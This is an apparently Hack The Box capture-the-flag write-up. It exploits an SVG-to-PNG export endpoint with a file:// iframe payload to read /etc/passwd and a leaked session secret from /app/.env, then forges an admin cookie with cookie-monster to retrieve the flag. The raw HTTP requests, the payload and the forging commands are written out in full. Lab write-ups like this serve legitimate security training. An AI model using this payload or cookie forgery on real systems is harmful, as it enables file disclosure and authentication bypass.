Got a way to display file via svg to png LFI CVE-2021-23631:

POST /api/export HTTP/1.1
Host: 138.68.175.87:30484
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <http://138.68.175.87:30484/dashboard>
Content-Type: application/json
Origin: <http://138.68.175.87:30484>
Content-Length: 283
DNT: 1
Connection: close
Cookie: session.sig=4u6WkhlFO5u5hCXaxOP-HGYLD9s; session=eyJ1c2VybmFtZSI6InRlc3QyIn0=
{"svg":"`<svg-dummy></svg-dummy><iframe src=\"file:///etc/passwd\" width=\"100%\" height=\"1000px\"></iframe><svg viewBox=\"0 0 240 80\" height=\"1000\" width=\"1000\" xmlns=\"<http://www.w3.org/2000/svg\>"><text x=\"0\" y=\"0\" class=\"Rrrrr\" id=\"demo\">data</text></svg>`"}

Got the secret to sign/verify cookie in /app/.env

SESSION_SECRET_KEY=5921719c3037662e94250307ec5ed1db

Used cookie-monster to generate the cookie:

root@sd-127123:/tmp# cat test.json
{"username":"admin"}
root@sd-127123:/tmp# cookie-monster -e -f test.json -k 5921719c3037662e94250307ec5ed1db
               _  _
             _/0\/ \_
    .-.   .-` \_/\0/ '-.
   /:::\ / ,_________,  \
  /\:::/ \  '. (:::/  `'-;
  \ `-'`\ '._ `"'"'\__    \
   `'-.  \   `)-=-=(  `,   |
       \  `-"`      `"-`   /

[+] Data Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=
[+] Signature Cookie: session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o

Burp repaeter:

GET /dashboard HTTP/1.1
Host: 138.68.150.120:31876
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: <http://138.68.150.120:31876/>
DNT: 1
Connection: close
Cookie: session=eyJ1c2VybmFtZSI6ImFkbWluIn0=; session.sig=EYdvy2mhVoEznETyhYjNYFFZM8o
Upgrade-Insecure-Requests: 1

The flag is in the source code response:

var flag = 'HTB{ZZZZZZZZZZZZZZZZZZZZZZ}'